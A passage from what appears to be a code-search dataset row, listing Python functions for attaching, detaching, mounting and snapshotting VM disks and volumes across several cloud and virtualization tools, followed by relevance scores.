locks will be released by the caller.", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def attach_volume(self, context, volume_id, instance_uuid, host_name,\n mountpoint, mode):\n @utils.synchronized(volume_id, external=True)\n def do_attach():\n # check the volume status before attaching\n volume = self.db.volume_get(context, volume_id)\n volume_metadata = self.db.volume_admin_metadata_get(\n context.elevated(), 
volume_id)\n if volume['status'] == 'attaching':\n if (volume['instance_uuid'] and volume['instance_uuid'] !=\n instance_uuid):\n msg = _(\"being attached by another instance\")\n raise exception.InvalidVolume(reason=msg)\n if (volume['attached_host'] and volume['attached_host'] !=\n host_name):\n msg = _(\"being attached by another host\")\n raise exception.InvalidVolume(reason=msg)\n if (volume_metadata.get('attached_mode') and\n volume_metadata.get('attached_mode') != mode):\n msg = _(\"being attached by different mode\")\n raise exception.InvalidVolume(reason=msg)\n elif volume['status'] != \"available\":\n msg = _(\"status must be available\")\n raise exception.InvalidVolume(reason=msg)\n # TODO(jdg): attach_time column is currently varchar\n # we should update this to a date-time object\n # also consider adding detach_time?\n self.db.volume_update(context, volume_id,\n {\"instance_uuid\": instance_uuid,\n \"mountpoint\": mountpoint,\n \"attached_host\": host_name\n })\n\n self.db.volume_admin_metadata_update(context.elevated(),\n volume_id,\n {\"attached_mode\": mode},\n False)\n return do_attach()", "def add_disks(self, num_disks, vm, size, disk_type='thin'):\n for _ in range(int(num_disks)):\n self.add_disk(vm, size, disk_type)", "def mount(self, dev, path, mount_options):\n # if directory is not a mount point, mount it\n if not os.path.ismount(path):\n # check to see if dev is LVM. If so, activate it's associated volume group\n vg = self.get_vg(dev)\n if len(vg) > 0:\n Helper._runOsCommand(\"sudo /sbin/pvscan && sudo /sbin/vgscan && sudo /sbin/lvscan && sudo /sbin/vgchange -ay %s\" % vg, self.tracer)\n # check / create mount point and mount device\n self._checkAndCreatePath(path)\n self._mount(dev, path, mount_options)\n else:\n self.tracer.info(\"device %s is already mounted to %s\" % (dev, path))", "def migration(self):\n nova_connection_destination = self.destination_connection.get_nova_connection(self.destination_region_name)\n cinder_connection_destination = self.destination_connection.get_cinder_connection(self.destination_region_name)\n self._make_migration()\n try:\n status = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()['status']\n except Exception:\n print(\"Can't found the instance\")\n return\n # TODO make the status in the right way\n while status != 'ACTIVE':\n status = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()['status']\n if status != 'ACTIVE' and status != 'BUILD':\n print(\"Can't launch the instance\")\n raise ValueError(\"Status is not ACTIVE or BUILD: Status = [{}]\".format(status))\n print(\"Instance launch\")\n\n disk_device_attached = False\n # TODO attach the disk in an other function\n while not disk_device_attached:\n disk_device_attached = True\n for storage_resource in self.resource_manager.storage_resource:\n if storage_resource.resource_created == {}:\n print(\"Can't attach the resource {}\".format(storage_resource))\n continue\n try:\n disk_information = cinder_connection_destination.connection.volumes.get(storage_resource.resource_created['id']).to_dict()\n except Exception as exception:\n print(\"Can't get the resource {}\".format(storage_resource))\n continue\n # TODO make an enum for disk_information\n if disk_information['status'] == 'available':\n attach_a_volume(nova_connection_destination, self.resource_manager.instance_resource.resource_created['id'], disk_information['id'])\n 
print(\"Disk {} attach to instance\".format(disk_information['id']))\n elif disk_information['status'] == 'error' or disk_information['status'] == 'error_deleting' or disk_information['status'] == 'error_backing-up' or disk_information['status'] == 'error_restoring' or disk_information['status'] == 'error_extending':\n print(\"Status error {} for the disk {}\".format(status, disk_information['id']))\n print(\"Disk information {}\".format(disk_information))\n continue\n elif disk_information['status'] != 'in-use':\n disk_device_attached = False\n\n information = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()\n print(\"Addresses\")\n print(json.dumps(information['addresses'], indent=4))", "def connect_instance_disk_to_mgmt(self, instance):\n for stg_elem, vios in self._get_bootdisk_iter(instance):\n msg_args = {'disk_name': stg_elem.name, 'vios_name': vios.name}\n\n # Create a new mapping. NOTE: If there's an existing mapping on\n # the other VIOS but not this one, we'll create a second mapping\n # here. It would take an extreme sequence of events to get to that\n # point, and the second mapping would be harmless anyway. The\n # alternative would be always checking all VIOSes for existing\n # mappings, which increases the response time of the common case by\n # an entire GET of VIOS+VIO_SMAP.\n LOG.debug(\"Mapping boot disk %(disk_name)s to the management \"\n \"partition from Virtual I/O Server %(vios_name)s.\",\n msg_args, instance=instance)\n try:\n tsk_map.add_vscsi_mapping(self.host_uuid, vios, self.mp_uuid,\n stg_elem)\n # If that worked, we're done. add_vscsi_mapping logged.\n return stg_elem, vios\n except Exception:\n LOG.exception(\"Failed to map boot disk %(disk_name)s to the \"\n \"management partition from Virtual I/O Server \"\n \"%(vios_name)s.\", msg_args, instance=instance)\n # Try the next hit, if available.\n # We either didn't find the boot dev, or failed all attempts to map it.\n raise npvmex.InstanceDiskMappingFailed(instance_name=instance.name)", "def create_snapshot_helper(\n vm,\n target_version=None,\n drives=None,\n balloon=False,\n diff_snapshots=False,\n):\n if diff_snapshots is False:\n snapshot_type = SnapshotType.FULL\n else:\n # Version 0.24 and greater has Diff and balloon support.\n snapshot_type = SnapshotType.DIFF\n\n if balloon:\n # Add a memory balloon with stats enabled.\n vm.api.balloon.put(\n amount_mib=0, deflate_on_oom=True, stats_polling_interval_s=1\n )\n\n test_drives = [] if drives is None else drives\n\n # Add disks.\n for scratch in test_drives:\n # Add a scratch 64MB RW non-root block device.\n scratchdisk = drive_tools.FilesystemFile(tempfile.mktemp(), size=64)\n vm.add_drive(scratch, scratchdisk.path)\n\n # Workaround FilesystemFile destructor removal of file.\n scratchdisk.path = None\n\n for _ in range(4):\n vm.add_net_iface()\n\n vm.start()\n\n # Iterate and validate connectivity on all ifaces after boot.\n for i in range(4):\n exit_code, _, _ = vm.ssh_iface(i).run(\"sync\")\n assert exit_code == 0\n\n # Mount scratch drives in guest.\n for blk in test_drives:\n # Create mount point and mount each device.\n cmd = f\"mkdir -p /tmp/mnt/{blk} && mount /dev/{blk} /tmp/mnt/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n # Create file using dd using O_DIRECT.\n # After resume we will compute md5sum on these files.\n dd = f\"dd if=/dev/zero of=/tmp/mnt/{blk}/test bs=4096 count=10 oflag=direct\"\n exit_code, _, _ = vm.ssh.run(dd)\n assert 
exit_code == 0\n\n # Unmount the device.\n cmd = f\"umount /dev/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n snapshot = vm.make_snapshot(snapshot_type, target_version=target_version)\n print(\"========== Firecracker create snapshot log ==========\")\n print(vm.log_data)\n vm.kill()\n return snapshot", "def flash_image(disk_image, device):\n cmd = 'dd if={disk_image} | pv | sudo dd of={device_path}'\n\n populated_cmd = cmd.format(\n disk_image=disk_image,\n device_path=device.path)\n\n # why check output? because then you can do the cool\n # dd | pv | dd trick. '|pv|'' is awesome stdout.\n output = check_output(populated_cmd, shell=True)\n print(output)", "def test_disk(self):\n self.command.package = self.input_ovf\n self.command.file_id = \"file1\"\n self.command.run()\n self.command.finished()\n self.check_diff(\"\"\"\n <ovf:References>\n- <ovf:File ovf:href=\"input.vmdk\" ovf:id=\"file1\" ovf:size=\"{vmdk_size}\" />\n <ovf:File ovf:href=\"input.iso\" ovf:id=\"file2\" ovf:size=\"{iso_size}\" />\n...\n <ovf:Info>Virtual disk information</ovf:Info>\n- <ovf:Disk ovf:capacity=\"1\" ovf:capacityAllocationUnits=\"byte * 2^30\" \\\novf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\" ovf:format=\"http://www.vmware.com/\\\ninterfaces/specifications/vmdk.html#streamOptimized\" />\n </ovf:DiskSection>\n...\n <rasd:AddressOnParent>0</rasd:AddressOnParent>\n- <rasd:ElementName>Hard Drive</rasd:ElementName>\n- <rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>\n- <rasd:InstanceID>6</rasd:InstanceID>\n- <rasd:Parent>3</rasd:Parent>\n- <rasd:ResourceType>17</rasd:ResourceType>\n- </ovf:Item>\n- <ovf:Item>\n- <rasd:AddressOnParent>0</rasd:AddressOnParent>\n <rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>\n\"\"\".format(vmdk_size=self.FILE_SIZE['input.vmdk'],\n iso_size=self.FILE_SIZE['input.iso']))\n self.assertFalse(os.path.exists(os.path.join(self.temp_dir,\n \"input.vmdk\")),\n \"deleted file should not be exported\")", "def reboot_guest(self, vm):\n try:\n self.client.reboot_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def pxe_netboot(self, filename):\n new_port = {\n 'extra_dhcp_opts': [\n {'opt_name': 'bootfile-name', 'opt_value': 'http://192.0.2.240:8088/' + filename, 'ip_version': 4, },\n {'opt_name': 'tftp-server', 'opt_value': '192.0.2.240', 'ip_version': '4'},\n {'opt_name': 'server-ip-address', 'opt_value': '192.0.2.240', 'ip_version': '4'}\n ]\n }\n self.neutron.update_port(self._provision_port_id, {'port': new_port})", "def attach(self):\n args = {\n 'detach': True,\n 'tty': True,\n }\n if self._args.command:\n args['command'] = self._args.command\n\n try:\n try:\n ident = self.client.images.pull(self._args.image)\n img = self.client.images.get(ident)\n except podman.ImageNotFound as e:\n sys.stdout.flush()\n print(\n 'Image {} not found.'.format(e.name),\n file=sys.stderr,\n flush=True)\n return 1\n\n ctnr = img.create(**args)\n ctnr.attach(eot=4)\n\n try:\n ctnr.start()\n print()\n except (BrokenPipeError, KeyboardInterrupt):\n print('\\nContainer disconnected.')\n except podman.ErrorOccurred as e:\n sys.stdout.flush()\n print(\n '{}'.format(e.reason).capitalize(),\n file=sys.stderr,\n flush=True)\n return 1", "def _attach_volume_to_sg(self, context, volume_id, sg_client):\n @utils.synchronized(sg_client.instance)\n def _do_attach_volume(context, volume_id, sg_client):\n try:\n old_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"old devices: %s\"), old_devices)\n nova_client = 
self._create_nova_client(self.admin_context)\n nova_client.volumes.create_server_volume(sg_client.instance,\n volume_id)\n cinder_client = self._create_cinder_client(context)\n cinder_volume = self._wait_cinder_volume_status(\n cinder_client, volume_id, 'in-use')\n if cinder_volume.status != 'in-use':\n raise Exception(_LE(\"attach volume to sg failed\"))\n new_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"new devices: %s\"), new_devices)\n added_devices = [device for device in new_devices\n if device not in old_devices]\n return added_devices[0]\n except Exception as err:\n LOG.error(err)\n raise exception.AttachSGFailed(reason=err)\n\n return _do_attach_volume(context, volume_id, sg_client)", "def disk():\n run(env.disk_usage_command % env)", "def set_disk_type(self, nDiskType):\n\t\tcall_sdk_function('PrlVmDevHd_SetDiskType', self.handle, nDiskType)", "def capture(self, instance_id, name, additional_disks=False, notes=None):\r\n vsi = self.get_instance(instance_id)\r\n\r\n disk_filter = lambda x: x['device'] == '0'\r\n # Disk 1 is swap partition. Need to skip its capture.\r\n if additional_disks:\r\n disk_filter = lambda x: x['device'] != '1'\r\n\r\n disks = [block_device for block_device in vsi['blockDevices']\r\n if disk_filter(block_device)]\r\n\r\n return self.guest.createArchiveTransaction(\r\n name, disks, notes, id=instance_id)", "def setDiskId(self, diskId):\n self.__diskId = diskId", "def _CheckAttachDisk(self, params):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n instance_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n if (disk.dev_type != instance_template and\n instance_template != constants.DT_DISKLESS):\n raise errors.OpPrereqError(\"Instance has '%s' template while disk has\"\n \" '%s' template\" %\n (instance_template, disk.dev_type),\n errors.ECODE_INVAL)\n\n instance_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)\n # Make sure we do not attach disks to instances on wrong nodes. 
If the\n # instance is diskless, that instance is associated only to the primary\n # node, whereas the disk can be associated to two nodes in the case of DRBD,\n # hence, we have a subset check here.\n if disk.nodes and not set(instance_nodes).issubset(set(disk.nodes)):\n raise errors.OpPrereqError(\"Disk nodes are %s while the instance's nodes\"\n \" are %s\" %\n (disk.nodes, instance_nodes),\n errors.ECODE_INVAL)\n # Make sure a DRBD disk has the same primary node as the instance where it\n # will be attached to.\n disk_primary = disk.GetPrimaryNode(self.instance.primary_node)\n if self.instance.primary_node != disk_primary:\n raise errors.OpExecError(\"The disks' primary node is %s whereas the \"\n \"instance's primary node is %s.\"\n % (disk_primary, self.instance.primary_node))", "def _CreateNewDisk(self, idx, params, _):\n # add a new disk\n disk_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n disk = self._GenerateDiskTemplateWrapper(idx, disk_template,\n params)\n new_disks = CreateDisks(self, self.instance, disks=[disk])\n self.cfg.AddInstanceDisk(self.instance.uuid, disk, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n if self.cluster.prealloc_wipe_disks:\n # Wipe new disk\n WipeOrCleanupDisks(self, self.instance,\n disks=[(idx, disk, 0)],\n cleanup=new_disks)\n\n changes = [\n (\"disk/%d\" % idx,\n \"add:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n if self.op.hotplug:\n result = self.rpc.call_blockdev_assemble(self.instance.primary_node,\n (disk, self.instance),\n self.instance, True, idx)\n if result.fail_msg:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n self.LogWarning(\"Can't assemble newly created disk %d: %s\",\n idx, result.fail_msg)\n else:\n _, link_name, uri = result.payload\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)" ]
[ "0.73531574", "0.68157685", "0.67563796", "0.66293067", "0.64325035", "0.6426697", "0.63882655", "0.6334873", "0.623497", "0.6223832", "0.62092334", "0.6202001", "0.6195019", "0.61449945", "0.6086266", "0.6073298", "0.6072383", "0.6067116", "0.6057906", "0.59617317", "0.58979154", "0.5896533", "0.5861778", "0.58505684", "0.58503675", "0.5837277", "0.58187383", "0.5788604", "0.5738113", "0.57315546", "0.5718782", "0.57136226", "0.56757367", "0.56208855", "0.5575326", "0.55664396", "0.5561868", "0.5550153", "0.55482286", "0.55343986", "0.5527139", "0.5524799", "0.5520515", "0.5484066", "0.5460997", "0.545557", "0.54523647", "0.54431415", "0.5441539", "0.5435524", "0.5435524", "0.5420449", "0.5363872", "0.53360766", "0.5316801", "0.5314659", "0.53122187", "0.5296047", "0.5273458", "0.5268158", "0.52607614", "0.52459884", "0.5244801", "0.5231324", "0.52298087", "0.52244496", "0.5220446", "0.52197963", "0.5213205", "0.521184", "0.5210166", "0.51888794", "0.5184167", "0.51840895", "0.5174495", "0.5153865", "0.5143351", "0.5139335", "0.5135656", "0.51296425", "0.5124402", "0.51168525", "0.51145244", "0.5098203", "0.5091405", "0.5080465", "0.5073299", "0.50715923", "0.50712025", "0.5069662", "0.5069586", "0.5064434", "0.50430274", "0.50406736", "0.5033876", "0.5014945", "0.50132006", "0.5008476", "0.49871492", "0.49857247" ]
0.7390084
0
Detach disk from VM by reconfiguration.
def detach_disk_from_vm(self, vm_ref, instance_name, device): client_factory = self._session._get_vim().client.factory vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec( client_factory, device) disk_key = device.key LOG.debug(_("Reconfiguring VM instance %(instance_name)s to detach " "disk %(disk_key)s") % locals()) reconfig_task = self._session._call_method( self._session._get_vim(), "ReconfigVM_Task", vm_ref, spec=vmdk_detach_config_spec) self._session._wait_for_task(instance_name, reconfig_task) LOG.debug(_("Reconfigured VM instance %(instance_name)s to detach " "disk %(disk_key)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def detachDiskFromMinipad(self , disk):\n return", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def disconnect_disk(self, instance, stg_ftsk=None, disk_type=None):\n raise NotImplementedError()", "def detach(self):\r\n\r\n return self.driver.detach_volume(volume=self)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name 
= connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def detach(self, name):\n volume_info = self.cm.find_name(name)\n if volume_info and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if len(vms) == 0:\n Console.error(f\"{name} is not attached to any vm\")\n else:\n removed = []\n for vm in vms:\n result = self.unmount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" not in mounts.keys():\n removed.append(vm)\n for vm in removed:\n vms.remove(vm)\n result = self.update_volume_after_detach(volume_info, vms)\n return result[0]\n else:\n Console.error(\"volume does not exist or volume had been deleted\")", "def detach(self):\n raise io.UnsupportedOperation", "def detach_volume(self, instance_name, mountpoint):\n return True", "def detach_volume(self, context, volume_id):\n # TODO(vish): refactor this into a more general \"unreserve\"\n # TODO(sleepsonthefloor): Is this 'elevated' appropriate?\n # self.db.volume_detached(context.elevated(), volume_id)\n self.db.volume_admin_metadata_delete(context.elevated(), volume_id,\n 'attached_mode')", "def detach_volume(self):\n\n # Choose the volume\n volume_id = self._choose_among_used_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Detach the volume\n print '# Detaching volume \"%s\"!' 
% volume_id\n if self.compute.detach_volume(volume_id):\n print 'The volume has been detached!'\n else:\n print 'The volume could not been detached'", "def delete(vmname, deldisk=True):\n\n dom = _conn.lookupByName(vmname)\n if dom.isActive():\n dom.destroy()\n infokeeper.update_status_vm(vmname, Instance.STATUS_POWER_OFF)\n dom.undefine()\n infokeeper.delete_vm(vmname)\n if deldisk:\n os.remove(os.path.join(base_disk_path, dom.name() + '.img'))\n return 'VM %s deleted' % vmname", "def detach(self, force=False):\r\n instance_id = None\r\n if self.attach_data:\r\n instance_id = self.attach_data.instance_id\r\n device = None\r\n if self.attach_data:\r\n device = self.attach_data.device\r\n return self.connection.detach_volume(self.id, instance_id, device, force)", "def detach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # init variables & arrays\n all_pds = []\n all_vgs = []\n unmount_err = 0\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch the host which currently owns the disk & the file path\n path = storage.get(\"path\")\n\n # try to unmount the file system twice\n self._forcedUnmount(dev, path, 2)\n\n # if it's still mounted, try killing blocking processes and umount again\n if os.path.ismount(path):\n self._lsof_and_kill(path)\n self._forcedUnmount(dev, path, 2)\n\n # if still mounted, raise exception. The taking over node will stonith this host\n if os.path.ismount(path):\n self.tracer.warning(\"A PID belonging to someone other than SIDADM is blocking the unmount. This node will be fenced\")\n self._umount(path, lazy=True)\n mount_err = 1\n\n # add to list of devices.\n all_pds.append(pd)\n\n # check to see if the device is a VG. If so, add it to the list of VG's\n all_vgs.append(self.get_vg(dev))\n\n # Stop each unique VG\n all_vgs = list(set(all_vgs))\n for vg in all_vgs:\n Helper._runOsCommand(\"sudo /sbin/vgchange -an %s\" % vg, self.tracer)\n self.tracer.info(\"stopping volume group %s\" % (vg))\n\n # for each unique disk detected, detach it using Google API's\n all_pds = list(set(all_pds))\n for pd_member in all_pds:\n self.detach_pd(conn, HOSTNAME, pd_member)\n\n # if there was an error unmounting, self fence\n if unmount_err == 1:\n self.fence(conn, pdhost)\n\n # tell HANA we successfully detached\n return 0", "def delete_disk(self, disk, delete_vmdk=True):\n backend_disk = self.get_backend_disk(disk)\n\n try:\n self.client.delete_disk(disk.vm.backend_id, disk.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n if delete_vmdk:\n vdm = self.soap_client.content.virtualDiskManager\n task = vdm.DeleteVirtualDisk(\n name=backend_disk.backing.fileName,\n datacenter=self.get_disk_datacenter(backend_disk),\n )\n try:\n pyVim.task.WaitForTask(task)\n except Exception:\n logger.exception('Unable to delete VMware disk. 
Disk ID: %s.', disk.id)\n raise VMwareBackendError('Unknown error.')\n signals.vm_updated.send(self.__class__, vm=disk.vm)", "def detach_volume(self, connection_info, instance, mountpoint):\n instance_name = instance['name']\n vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name)\n if vm_ref is None:\n raise exception.InstanceNotFound(instance_id=instance_name)\n # Detach Volume from VM\n LOG.debug(_(\"Detach_volume: %(instance_name)s, %(mountpoint)s\")\n % locals())\n driver_type = connection_info['driver_volume_type']\n if driver_type not in ['iscsi']:\n raise exception.VolumeDriverNotFound(driver_type=driver_type)\n data = connection_info['data']\n\n # Discover iSCSI Target\n device_name, uuid = volume_util.find_st(self._session, data,\n self._cluster)\n if device_name is None:\n raise volume_util.StorageError(_(\"Unable to find iSCSI Target\"))\n\n # Get the vmdk file name that the VM is pointing to\n hardware_devices = self._session._call_method(vim_util,\n \"get_dynamic_property\", vm_ref,\n \"VirtualMachine\", \"config.hardware.device\")\n device = vm_util.get_rdm_disk(hardware_devices, uuid)\n if device is None:\n raise volume_util.StorageError(_(\"Unable to find volume\"))\n self.detach_disk_from_vm(vm_ref, instance_name, device)\n LOG.info(_(\"Mountpoint %(mountpoint)s detached from \"\n \"instance %(instance_name)s\") % locals())", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def vm_diskdelete(args):\n name = args.name\n diskname = args.diskname\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if diskname is None:\n common.pprint(\"Missing diskname. 
Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Deleting disk %s\" % diskname)\n k.delete_disk(name=name, diskname=diskname, pool=pool)\n return", "async def eject(self) -> None:\n await self.dbus.Drive.call_eject(UDISKS2_DEFAULT_OPTIONS)", "def down():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant halt from the vagrant folder.\n command = [\"vagrant\", \"halt\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant halt'.\")\n exit(1)", "def detach(target, sysip):\n click.secho(\"Attempting to detach template.\")\n\n payload = {\n \"deviceType\":\"vedge\",\n \"devices\":[ \n {\n \"deviceId\":str(target),\n \"deviceIP\":str(sysip)\n }\n ]\n }\n\n url = base_url + \"/template/config/device/mode/cli\"\n\n response = requests.post(url=url, data=json.dumps(payload), headers=header, verify=False)\n if response.status_code == 200:\n id = response.json()[\"id\"]\n url = base_url + \"/device/action/status/\" + str(id)\n while(1):\n status_res = requests.get(url,headers=header,verify=False)\n if status_res.status_code == 200:\n push_status = status_res.json()\n if push_status['summary']['status'] == \"done\":\n if 'Success' in push_status['summary']['count']:\n print(\"Changed configuration mode to CLI\")\n elif 'Failure' in push_status['summary']['count']:\n print(\"Failed to change configuration mode to CLI\")\n exit()\n break\n else:\n print(\"Failed to detach template with error \" + response.text)\n exit()", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()", "def _unprovision_node(self, conn):\n conn.run(f\"rm -rf {EXPORTER_HOME}\")", "def tear_down(duthost1, duthost2, ptfhost, localhost, collect):\n yield\n\n mclag_interfaces = collect[duthost1.hostname]['mclag_interfaces']\n cmds_to_del_lags = ['ip link del {}'.format(lag) for lag in mclag_interfaces]\n ptfhost.shell_cmds(cmds=cmds_to_del_lags)\n\n 
